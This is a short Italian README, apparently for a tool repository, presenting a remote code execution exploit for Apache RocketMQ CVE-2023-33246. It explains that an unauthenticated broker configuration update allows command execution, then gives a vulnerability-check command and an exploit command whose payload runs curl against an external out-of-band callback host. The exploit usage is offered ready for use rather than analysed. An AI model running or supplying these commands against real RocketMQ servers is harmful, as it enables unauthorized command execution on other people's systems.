
Exploit di Remote Code Execution per RocketMQ CVE-2023-33246
Le versioni di RocketMQ 5.1.0 e precedenti sono vulnerabili all'Iniezione di Codice Arbitrario. Il componente Broker di RocketMQ è esposto sulla rete esterna e non dispone di verifica dei permessi. Un attaccante può sfruttare questa vulnerabilità utilizzando la funzione di aggiornamento della configurazione per eseguire comandi come l'utente di sistema con cui RocketMQ è in esecuzione. Inoltre, un attaccante può ottenere lo stesso effetto falsificando il contenuto del protocollo RocketMQ.
verifica
./RocketMQRceCheck -host 127.0.0.1 -port 9876
exploit
RocketMQ_RCE_EXPLOIT 127.0.0.1 10911 curl chw9ft72vtc00002z5k0ge6rz7eyyyyyb.oast.fun/test